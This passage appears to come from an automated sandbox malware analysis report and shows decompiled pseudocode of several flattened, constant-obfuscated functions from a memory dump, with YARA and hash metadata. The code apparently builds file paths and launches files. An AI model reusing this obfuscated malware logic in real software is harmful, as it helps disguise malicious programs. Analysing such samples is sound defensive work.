                                          				E006D360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
                                          				E006D2674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
                                          				_t83 =  *((intOrPtr*)(_t97 + 4));
                                          				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
                                          				return _t83;
                                          			}















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: [m1$JX
                                          • API String ID: 0-848362422
                                          • Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                          • Instruction ID: ec1ef828e1802be88bf6a0db5ccab955f4d112329d5856be894fe8a39cd7547e
                                          • Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                          • Instruction Fuzzy Hash: F3310476900309FBCF58CFA5D94A89EBBB2FF44314F20C059E9196A260D3799B24DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E006C9A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				unsigned int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				char _v196;
                                          				void* _t297;
                                          				signed int _t335;
                                          				signed int* _t340;
                                          				signed int _t342;
                                          				signed int _t343;
                                          				signed int _t344;
                                          				signed int _t345;
                                          				signed int _t346;
                                          				signed int _t347;
                                          				char* _t354;
                                          				void* _t380;
                                          				void* _t381;
                                          				void* _t382;
                                          				void* _t383;
                                          				void* _t386;
                                          
                                          				_push(_a8);
                                          				_t340 = __edx;
                                          				_t380 = __ecx;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t297);
                                          				_v24 = 0xc44;
                                          				_t383 = _t382 + 0x10;
                                          				_v24 = _v24 << 2;
                                          				_v24 = _v24 << 5;
                                          				_t381 = 0x108b8bb2;
                                          				_v24 = _v24 >> 1;
                                          				_v24 = _v24 ^ 0x0003068b;
                                          				_v96 = 0x3b9e;
                                          				_v96 = _v96 ^ 0x893884c8;
                                          				_v96 = _v96 ^ 0x89388972;
                                          				_v48 = 0x8b0e;
                                          				_v48 = _v48 << 6;
                                          				_v48 = _v48 + 0xffffd606;
                                          				_t342 = 0x6d;
                                          				_v48 = _v48 * 0x69;
                                          				_v48 = _v48 ^ 0x0e30afa5;
                                          				_v76 = 0xbb1c;
                                          				_v76 = _v76 + 0xffff2a80;
                                          				_v76 = _v76 | 0x384e25df;
                                          				_v76 = _v76 ^ 0xffffbccb;
                                          				_v68 = 0x817b;
                                          				_v68 = _v68 + 0xb36b;
                                          				_v68 = _v68 * 0x62;
                                          				_v68 = _v68 ^ 0x00761722;
                                          				_v112 = 0x78f7;
                                          				_v112 = _v112 + 0xabd9;
                                          				_v112 = _v112 ^ 0x00010bcc;
                                          				_v64 = 0xef7a;
                                          				_v64 = _v64 * 0x6b;
                                          				_v64 = _v64 >> 6;
                                          				_v64 = _v64 ^ 0x0001bb5c;
                                          				_v104 = 0x32c;
                                          				_v104 = _v104 << 5;
                                          				_v104 = _v104 ^ 0x00002d3d;
                                          				_v52 = 0x7426;
                                          				_v52 = _v52 * 0x5d;
                                          				_v52 = _v52 ^ 0xa80e6da6;
                                          				_v52 = _v52 / _t342;
                                          				_v52 = _v52 ^ 0x018aaa04;
                                          				_v12 = 0xd0fb;
                                          				_t343 = 0x6a;
                                          				_v12 = _v12 / _t343;
                                          				_v12 = _v12 + 0xffff7920;
                                          				_v12 = _v12 + 0xffff83ce;
                                          				_v12 = _v12 ^ 0xfffec2a6;
                                          				_v108 = 0xe89;
                                          				_v108 = _v108 + 0x85a8;
                                          				_v108 = _v108 ^ 0x0000adac;
                                          				_v92 = 0xd004;
                                          				_v92 = _v92 + 0xffff90ab;
                                          				_v92 = _v92 | 0x2bfbb4c5;
                                          				_v92 = _v92 ^ 0x2bfba16d;
                                          				_v8 = 0x51d1;
                                          				_v8 = _v8 ^ 0x91ec542a;
                                          				_v8 = _v8 | 0xbd5d6296;
                                          				_v8 = _v8 + 0xe80e;
                                          				_v8 = _v8 ^ 0xbdfe1041;
                                          				_v40 = 0xc5fc;
                                          				_v40 = _v40 | 0x331e7523;
                                          				_v40 = _v40 + 0xc476;
                                          				_v40 = _v40 | 0xe5b13554;
                                          				_v40 = _v40 ^ 0xf7bfa45a;
                                          				_v116 = 0x6d98;
                                          				_v116 = _v116 >> 0xf;
                                          				_v116 = _v116 ^ 0x000044aa;
                                          				_v88 = 0x7357;
                                          				_v88 = _v88 + 0x7cff;
                                          				_t344 = 0x6e;
                                          				_v88 = _v88 * 0x25;
                                          				_v88 = _v88 ^ 0x0022e11b;
                                          				_v56 = 0x39e0;
                                          				_v56 = _v56 + 0xffffb0fb;
                                          				_v56 = _v56 << 6;
                                          				_v56 = _v56 ^ 0xfffab6b2;
                                          				_v44 = 0x2257;
                                          				_v44 = _v44 / _t344;
                                          				_v44 = _v44 + 0x17fe;
                                          				_v44 = _v44 + 0xffff4b8e;
                                          				_v44 = _v44 ^ 0xffff3a3c;
                                          				_v16 = 0xac11;
                                          				_t345 = 0xd;
                                          				_v16 = _v16 / _t345;
                                          				_t346 = 0x22;
                                          				_v16 = _v16 / _t346;
                                          				_v16 = _v16 + 0xffff8051;
                                          				_v16 = _v16 ^ 0xffffec84;
                                          				_v32 = 0x207e;
                                          				_v32 = _v32 + 0xffff85d9;
                                          				_v32 = _v32 | 0x92dc0f10;
                                          				_t347 = 0x3d;
                                          				_v32 = _v32 * 0x4f;
                                          				_v32 = _v32 ^ 0xffe76a4a;
                                          				_v72 = 0xf5a4;
                                          				_v72 = _v72 << 9;
                                          				_v72 = _v72 + 0x6505;
                                          				_v72 = _v72 ^ 0x01ebcff4;
                                          				_v124 = 0xf81;
                                          				_v124 = _v124 + 0x174a;
                                          				_v124 = _v124 ^ 0x00005562;
                                          				_v80 = 0xd566;
                                          				_v80 = _v80 << 0xd;
                                          				_v80 = _v80 << 0xa;
                                          				_v80 = _v80 ^ 0xb30025af;
                                          				_v20 = 0xd4e9;
                                          				_v20 = _v20 ^ 0x0ea0d6e7;
                                          				_v20 = _v20 / _t347;
                                          				_v20 = _v20 | 0xf8279f10;
                                          				_v20 = _v20 ^ 0xf83fc9b3;
                                          				_v100 = 0xda9a;
                                          				_v100 = _v100 * 3;
                                          				_v100 = _v100 ^ 0x0002f5f9;
                                          				_v36 = 0x78aa;
                                          				_v36 = _v36 + 0x4117;
                                          				_v36 = _v36 >> 0xa;
                                          				_v36 = _v36 | 0x25804fa7;
                                          				_v36 = _v36 ^ 0x25803510;
                                          				_v28 = 0x20d5;
                                          				_v28 = _v28 + 0xfab3;
                                          				_v28 = _v28 | 0xa4f7c20c;
                                          				_v28 = _v28 >> 3;
                                          				_v28 = _v28 ^ 0x149e8671;
                                          				_v60 = 0x9445;
                                          				_v60 = _v60 | 0xc2ce9f5c;
                                          				_v60 = _v60 ^ 0x46e2878d;
                                          				_v60 = _v60 ^ 0x842c5375;
                                          				_v120 = 0x3512;
                                          				_v120 = _v120 << 9;
                                          				_v120 = _v120 ^ 0x006a5627;
                                          				_v84 = 0xeb51;
                                          				_v84 = _v84 * 0x42;
                                          				_v84 = _v84 >> 0xf;
                                          				_v84 = _v84 ^ 0x000027de;
                                          				goto L1;
                                          				do {
                                          					while(1) {
                                          						L1:
                                          						_t386 = _t381 - 0x1e9793a2;
                                          						if(_t386 > 0) {
                                          							break;
                                          						}
                                          						if(_t386 == 0) {
                                          							E006C7998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
                                          							_t383 = _t383 + 0xc;
                                          							_t381 = 0x39ecd3df;
                                          							continue;
                                          						} else {
                                          							if(_t381 == 0xaa31e0c) {
                                          								E006C7998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
                                          								_t383 = _t383 + 0xc;
                                          								_t381 = 0x1e9793a2;
                                          								continue;
                                          							} else {
                                          								if(_t381 == 0x108b8bb2) {
                                          									 *_t340 =  *_t340 & 0x00000000;
                                          									_t381 = 0x23e4e38d;
                                          									_t340[1] = _t340[1] & 0x00000000;
                                          									continue;
                                          								} else {
                                          									if(_t381 == 0x15969886) {
                                          										_t354 =  &_v196;
                                          										E006D360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
                                          										_t383 = _t383 + 0xc;
                                          										_t381 = 0x15fd630a;
                                          										continue;
                                          									} else {
                                          										if(_t381 == 0x15fd630a) {
                                          											_t354 =  &_v196;
                                          											E006D360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
                                          											_t383 = _t383 + 0xc;
                                          											_t381 = 0x2ea6dd43;
                                          											continue;
                                          										} else {
                                          											if(_t381 == 0x18d3ef4a) {
                                          												_push(_t354);
                                          												_t335 = E006C8736(_t340[1]);
                                          												 *_t340 = _t335;
                                          												_t354 = _t354;
                                          												__eflags = _t335;
                                          												if(__eflags != 0) {
                                          													_t381 = 0x22e1be53;
                                          													continue;
                                          												}
                                          											} else {
                                          												if(_t381 != 0x1a35bcc9) {
                                          													goto L28;
                                          												} else {
                                          													_t354 =  &_v196;
                                          													E006D360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
                                          													_t383 = _t383 + 0xc;
                                          													_t381 = 0xaa31e0c;
                                          													continue;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L23:
                                          						__eflags =  *_t340;
                                          						_t282 =  *_t340 != 0;
                                          						__eflags = _t282;
                                          						return 0 | _t282;
                                          					}
                                          					__eflags = _t381 - 0x22e1be53;
                                          					if(_t381 == 0x22e1be53) {
                                          						E006D50F2( &_v196, _v76, _v68, _v112, _t340);
                                          						_t383 = _t383 + 0xc;
                                          						_t381 = 0x2d15c716;
                                          						goto L28;
                                          					} else {
                                          						__eflags = _t381 - 0x23e4e38d;
                                          						if(_t381 == 0x23e4e38d) {
                                          							_t340[1] = E006D7F1F(_t380);
                                          							_t381 = 0x18d3ef4a;
                                          							goto L1;
                                          						} else {
                                          							__eflags = _t381 - 0x2d15c716;
                                          							if(__eflags == 0) {
                                          								E006C7998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
                                          								_t383 = _t383 + 0xc;
                                          								_t381 = 0x15969886;
                                          								goto L1;
                                          							} else {
                                          								__eflags = _t381 - 0x2ea6dd43;
                                          								if(_t381 == 0x2ea6dd43) {
                                          									E006D360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
                                          									_t383 = _t383 + 0xc;
                                          									_t381 = 0x1a35bcc9;
                                          									goto L1;
                                          								} else {
                                          									__eflags = _t381 - 0x39ecd3df;
                                          									if(_t381 != 0x39ecd3df) {
                                          										goto L28;
                                          									} else {
                                          										E006D360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					goto L23;
                                          					L28:
                                          					__eflags = _t381 - 0x1d48367e;
                                          				} while (__eflags != 0);
                                          				goto L23;
                                          			}


















































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 'Vj
                                          • API String ID: 0-2210790371
                                          • Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                          • Instruction ID: 4bbe97ae95d15ce3e98052f33f1db1c3ec65c44e181b9eed4eb3722c8d0a1623
                                          • Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                          • Instruction Fuzzy Hash: 84F12372C003199BDF18CFA5C98AAEEBBB2FF04314F24815DE4167A2A0D7B45A46CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006D1BDF() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				unsigned int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				unsigned int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				char _v112;
                                          				short _t303;
                                          				void* _t311;
                                          				void* _t314;
                                          				void* _t315;
                                          				intOrPtr _t347;
                                          				void* _t348;
                                          				short* _t349;
                                          				void* _t350;
                                          				short* _t351;
                                          				short* _t352;
                                          				signed int _t353;
                                          				signed int _t354;
                                          				signed int _t355;
                                          				signed int _t356;
                                          				signed int _t357;
                                          				signed int _t358;
                                          				signed int _t359;
                                          				signed int _t360;
                                          				signed int _t361;
                                          				signed int _t362;
                                          				signed int _t363;
                                          				signed int _t364;
                                          				void* _t365;
                                          
                                          				_t347 =  *0x6dca2c; // 0x248300
                                          				_v48 = 0xd714;
                                          				_t348 = _t347 + 0x230;
                                          				_v48 = _v48 ^ 0xcd668ab2;
                                          				_t315 = 0x3a31b660;
                                          				_v48 = _v48 | 0x2f181106;
                                          				_v48 = _v48 ^ 0xef7e1823;
                                          				_v84 = 0x5d44;
                                          				_t353 = 0x2d;
                                          				_v84 = _v84 / _t353;
                                          				_v84 = _v84 ^ 0x00001499;
                                          				_v28 = 0xf70b;
                                          				_t354 = 0xd;
                                          				_v28 = _v28 / _t354;
                                          				_v28 = _v28 | 0x6a0646bd;
                                          				_v28 = _v28 >> 1;
                                          				_v28 = _v28 ^ 0x35037bad;
                                          				_v24 = 0xed7c;
                                          				_v24 = _v24 + 0xffff8d1e;
                                          				_v24 = _v24 + 0xffff0c72;
                                          				_t355 = 0x48;
                                          				_v24 = _v24 / _t355;
                                          				_v24 = _v24 ^ 0x038e22ac;
                                          				_v64 = 0x5fc5;
                                          				_v64 = _v64 >> 4;
                                          				_v64 = _v64 << 1;
                                          				_v64 = _v64 ^ 0x000058c3;
                                          				_v92 = 0x2688;
                                          				_v92 = _v92 | 0xea27999c;
                                          				_v92 = _v92 ^ 0xea278961;
                                          				_v96 = 0x4a14;
                                          				_t356 = 0x1f;
                                          				_v96 = _v96 / _t356;
                                          				_v96 = _v96 ^ 0x0000119a;
                                          				_v36 = 0xd568;
                                          				_v36 = _v36 ^ 0xbcd770ac;
                                          				_v36 = _v36 << 6;
                                          				_v36 = _v36 << 8;
                                          				_v36 = _v36 ^ 0xe97134d4;
                                          				_v68 = 0xedd2;
                                          				_t357 = 0x63;
                                          				_v68 = _v68 * 0x5e;
                                          				_v68 = _v68 + 0xde9c;
                                          				_v68 = _v68 ^ 0x00587d35;
                                          				_v32 = 0x24d4;
                                          				_v32 = _v32 << 9;
                                          				_v32 = _v32 ^ 0x2e569407;
                                          				_v32 = _v32 << 0xf;
                                          				_v32 = _v32 ^ 0x9e03fcb0;
                                          				_v104 = 0x1c4d;
                                          				_v104 = _v104 + 0xfffffff9;
                                          				_v104 = _v104 ^ 0x00005633;
                                          				_v40 = 0xb450;
                                          				_v40 = _v40 + 0x94db;
                                          				_v40 = _v40 | 0x3dcacfe3;
                                          				_v40 = _v40 / _t357;
                                          				_v40 = _v40 ^ 0x009f9709;
                                          				_v100 = 0x6d07;
                                          				_t358 = 0x45;
                                          				_v100 = _v100 * 0x69;
                                          				_v100 = _v100 ^ 0x002cf62e;
                                          				_v72 = 0x5e87;
                                          				_v72 = _v72 / _t358;
                                          				_v72 = _v72 + 0xffff9f14;
                                          				_v72 = _v72 ^ 0xffffe852;
                                          				_v56 = 0x964f;
                                          				_v56 = _v56 << 0xd;
                                          				_v56 = _v56 + 0x58a7;
                                          				_v56 = _v56 ^ 0x12ca7579;
                                          				_v8 = 0x11e7;
                                          				_t359 = 0x26;
                                          				_v8 = _v8 * 0x7e;
                                          				_v8 = _v8 << 7;
                                          				_v8 = _v8 / _t359;
                                          				_v8 = _v8 ^ 0x001dbdc0;
                                          				_v52 = 0x5afe;
                                          				_t360 = 0x23;
                                          				_v52 = _v52 * 0x24;
                                          				_v52 = _v52 / _t360;
                                          				_v52 = _v52 ^ 0x00001a55;
                                          				_v88 = 0xb83d;
                                          				_v88 = _v88 >> 0xd;
                                          				_v88 = _v88 ^ 0x00006413;
                                          				_v20 = 0x5af3;
                                          				_t361 = 0x3a;
                                          				_v20 = _v20 * 0x6b;
                                          				_v20 = _v20 + 0x6d49;
                                          				_v20 = _v20 ^ 0x8eb5ed48;
                                          				_v20 = _v20 ^ 0x8e93dded;
                                          				_v16 = 0x70c;
                                          				_v16 = _v16 / _t361;
                                          				_v16 = _v16 + 0xffff5089;
                                          				_v16 = _v16 | 0x770f0b4d;
                                          				_v16 = _v16 ^ 0xffff12de;
                                          				_v60 = 0xa79c;
                                          				_v60 = _v60 | 0xbac1c5ec;
                                          				_v60 = _v60 + 0x6b12;
                                          				_v60 = _v60 ^ 0xbac228f9;
                                          				_v12 = 0x5546;
                                          				_v12 = _v12 << 0xc;
                                          				_v12 = _v12 >> 0xd;
                                          				_v12 = _v12 * 0x74;
                                          				_v12 = _v12 ^ 0x001372eb;
                                          				_v80 = 0x25db;
                                          				_v80 = _v80 << 0xd;
                                          				_v80 = _v80 << 3;
                                          				_v80 = _v80 ^ 0x25db4552;
                                          				_v44 = 0xe1b0;
                                          				_v44 = _v44 + 0xffff2f0e;
                                          				_v44 = _v44 | 0x46f5308b;
                                          				_v44 = _v44 * 0x56;
                                          				_v44 = _v44 ^ 0xd65e5bab;
                                          				_v108 = 0x5856;
                                          				_v108 = _v108 ^ 0x78cd5bef;
                                          				_v108 = _v108 ^ 0x78cd26cd;
                                          				_v76 = 0xfba5;
                                          				_v76 = _v76 + 0xffff77ce;
                                          				_t362 = 0x11;
                                          				_v76 = _v76 / _t362;
                                          				_v76 = _v76 ^ 0x00005641;
                                          				_t314 = 2;
                                          				do {
                                          					while(_t315 != 0x1de3f48) {
                                          						if(_t315 == 0x1f19b69e) {
                                          							_t363 = E006C78A5(_t315, _t315, 0x10, _t315, 4);
                                          							E006C7787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
                                          							_t350 = _t348 + _t314;
                                          							E006C7787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
                                          							_t365 = _t365 + 0x40;
                                          							_t351 = _t350 + _t363 * 2;
                                          							_t315 = 0x344e60d4;
                                          							_t303 = 0x5c;
                                          							 *_t351 = _t303;
                                          							_t348 = _t351 + _t314;
                                          							continue;
                                          						} else {
                                          							if(_t315 == 0x344e60d4) {
                                          								_t364 = E006C78A5(_t315, _t315, 0x10, _t315, 4);
                                          								E006C7787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
                                          								_t365 = _t365 + 0x28;
                                          								_t352 = _t348 + _t364 * 2;
                                          								_t315 = 0x1de3f48;
                                          								_t311 = 0x2e;
                                          								 *_t352 = _t311;
                                          								_t348 = _t352 + _t314;
                                          								continue;
                                          							} else {
                                          								if(_t315 == 0x3a31b660) {
                                          									_t311 = E006D8C8F(_t315);
                                          									_v112 = _t311;
                                          									_t315 = 0x1f19b69e;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						goto L9;
                                          					}
                                          					E006C7787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
                                          					_t349 = _t348 + 6;
                                          					_t365 = _t365 + 0x18;
                                          					_t315 = 0x2228f3b5;
                                          					 *_t349 = 0;
                                          					_t348 = _t349 + _t314;
                                          					L9:
                                          				} while (_t315 != 0x2228f3b5);
                                          				return _t311;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 5}X
                                          • API String ID: 0-583016468
                                          • Opcode ID: bc044b1cac4d7c6f81e3d077147fa65b1a7dff02aa8b70cbe0c760ab3c3dc8ee
                                          • Instruction ID: e5e8eda3313d30fc8501b2ec0203910fa88463b472e743f750a2ef3c445cac48
                                          • Opcode Fuzzy Hash: bc044b1cac4d7c6f81e3d077147fa65b1a7dff02aa8b70cbe0c760ab3c3dc8ee
                                          • Instruction Fuzzy Hash: 0AD11471D0031DABDB18DFE5C88A9DEBBB1FB44314F20801AE512BA2A0D7B91A46CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E006C62A3() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				char _v608;
                                          				char _v1128;
                                          				void* _t179;
                                          				void* _t180;
                                          				intOrPtr _t182;
                                          				void* _t190;
                                          				intOrPtr _t206;
                                          				void* _t209;
                                          				signed int _t210;
                                          				signed int _t211;
                                          				signed int _t212;
                                          				void* _t214;
                                          
                                          				_v88 = 0xf2dad;
                                          				_t209 = 0;
                                          				_t190 = 0x374ac1da;
                                          				_v84 = _v84 & 0;
                                          				_v40 = 0xb12b;
                                          				_v40 = _v40 << 0xe;
                                          				_v40 = _v40 >> 0xf;
                                          				_v40 = _v40 ^ 0x000058bc;
                                          				_v60 = 0xf727;
                                          				_t210 = 0x4f;
                                          				_v60 = _v60 / _t210;
                                          				_v60 = _v60 ^ 0x00007065;
                                          				_v8 = 0x9eec;
                                          				_v8 = _v8 + 0xd770;
                                          				_v8 = _v8 >> 0xe;
                                          				_v8 = _v8 >> 6;
                                          				_v8 = _v8 ^ 0x00000fb6;
                                          				_v44 = 0x7887;
                                          				_v44 = _v44 << 5;
                                          				_v44 = _v44 >> 0xc;
                                          				_v44 = _v44 ^ 0x00001109;
                                          				_v16 = 0xef0c;
                                          				_t211 = 0x7a;
                                          				_v16 = _v16 * 0x14;
                                          				_v16 = _v16 ^ 0xca26cbdc;
                                          				_v16 = _v16 | 0x7bdc5f23;
                                          				_v16 = _v16 ^ 0xfbfc55fd;
                                          				_v76 = 0xd8b4;
                                          				_v76 = _v76 + 0x9c32;
                                          				_v76 = _v76 ^ 0x00017966;
                                          				_v36 = 0x1b76;
                                          				_v36 = _v36 + 0x8638;
                                          				_v36 = _v36 | 0x465c0394;
                                          				_v36 = _v36 ^ 0x465cdef1;
                                          				_v28 = 0xf8c7;
                                          				_v28 = _v28 ^ 0x90f840f6;
                                          				_v28 = _v28 / _t211;
                                          				_v28 = _v28 ^ 0x01300a73;
                                          				_v80 = 0x4878;
                                          				_v80 = _v80 ^ 0xf33f81bb;
                                          				_v80 = _v80 ^ 0xf33fed7c;
                                          				_v12 = 0x5e32;
                                          				_v12 = _v12 >> 5;
                                          				_v12 = _v12 | 0xb939d170;
                                          				_v12 = _v12 + 0xffffe46d;
                                          				_v12 = _v12 ^ 0xb939c5f3;
                                          				_v72 = 0xdcc7;
                                          				_t212 = 5;
                                          				_v72 = _v72 / _t212;
                                          				_v72 = _v72 ^ 0x00000998;
                                          				_v52 = 0xf409;
                                          				_v52 = _v52 >> 7;
                                          				_v52 = _v52 >> 2;
                                          				_v52 = _v52 ^ 0x00002b61;
                                          				_v20 = 0x5cd8;
                                          				_v20 = _v20 + 0x5908;
                                          				_v20 = _v20 * 0x1c;
                                          				_v20 = _v20 * 0x14;
                                          				_v20 = _v20 ^ 0x018d9ab8;
                                          				_v32 = 0x162d;
                                          				_v32 = _v32 + 0xffff1b5c;
                                          				_v32 = _v32 >> 3;
                                          				_v32 = _v32 ^ 0x1fff9926;
                                          				_v64 = 0x95af;
                                          				_v64 = _v64 + 0xffff7063;
                                          				_v64 = _v64 ^ 0x00004670;
                                          				_v56 = 0xeead;
                                          				_v56 = _v56 + 0xffffd284;
                                          				_v56 = _v56 ^ 0x94a6c65a;
                                          				_v56 = _v56 ^ 0x94a662be;
                                          				_v68 = 0xa18;
                                          				_v68 = _v68 >> 0xa;
                                          				_v68 = _v68 ^ 0x0000400d;
                                          				_v48 = 0xd4d3;
                                          				_v48 = _v48 * 3;
                                          				_v48 = _v48 << 3;
                                          				_v48 = _v48 ^ 0x0013dfa3;
                                          				_v24 = 0x2d4a;
                                          				_v24 = _v24 << 9;
                                          				_v24 = _v24 + 0x17ff;
                                          				_v24 = _v24 ^ 0x005aa30d;
                                          				do {
                                          					while(_t190 != 0x17ec002) {
                                          						if(_t190 == 0x20702549) {
                                          							_push(_v36);
                                          							_t180 = E006D889D(0x6dc930, _v76, __eflags);
                                          							_t182 =  *0x6dca2c; // 0x248300
                                          							_t206 =  *0x6dca2c; // 0x248300
                                          							E006C29E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
                                          							E006D2025(_v20, _t180, _v32, _v64);
                                          							_t214 = _t214 + 0x30;
                                          							_t190 = 0x17ec002;
                                          							continue;
                                          						} else {
                                          							if(_t190 == 0x374ac1da) {
                                          								_push(_t190);
                                          								_push(_t190);
                                          								E006CC6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
                                          								_t214 = _t214 + 0x1c;
                                          								_t190 = 0x20702549;
                                          								continue;
                                          							}
                                          						}
                                          						goto L7;
                                          					}
                                          					_push(_t190);
                                          					_push(_v24);
                                          					_push(0);
                                          					_push(_v48);
                                          					_push(0);
                                          					_push(_v68);
                                          					_push( &_v1128);
                                          					_t179 = E006C568E(_v56, 0);
                                          					_t214 = _t214 + 0x1c;
                                          					__eflags = _t179;
                                          					_t209 = (_t179 != 0) ? 1 : _t209;
                                          					_t190 = 0x3985ca2d;
                                          					L7:
                                          					__eflags = _t190 - 0x3985ca2d;
                                          				} while (__eflags != 0);
                                          				return _t209;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: I%p
                                          • API String ID: 0-3985577374
                                          • Opcode ID: f54ab2a2636a8e96c8c58832449f3712c5c3663fedf756b3f649085e37ade23f
                                          • Instruction ID: 3828758527b8c2e7430392adfee543a78b0ffca5e654735eaa021980cd5e32cd
                                          • Opcode Fuzzy Hash: f54ab2a2636a8e96c8c58832449f3712c5c3663fedf756b3f649085e37ade23f
                                          • Instruction Fuzzy Hash: AD812871D0021DABDF58CFE5D94A9EEFBB1FB44318F108159E511B6260D7B50A05CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006D0D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				char _v48;
                                          				void* _t128;
                                          				signed int _t155;
                                          				signed int _t156;
                                          				signed int _t157;
                                          				signed int _t158;
                                          				void* _t173;
                                          				signed int _t174;
                                          
                                          				_push(_a12);
                                          				_t173 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006C602B(_t128);
                                          				_v8 = 0x6813;
                                          				_v8 = _v8 << 6;
                                          				_v8 = _v8 ^ 0xf4e07894;
                                          				_v8 = _v8 | 0x641e1778;
                                          				_v8 = _v8 ^ 0xf4fe1535;
                                          				_v16 = 0x7d9d;
                                          				_t155 = 0x16;
                                          				_v16 = _v16 * 0x4d;
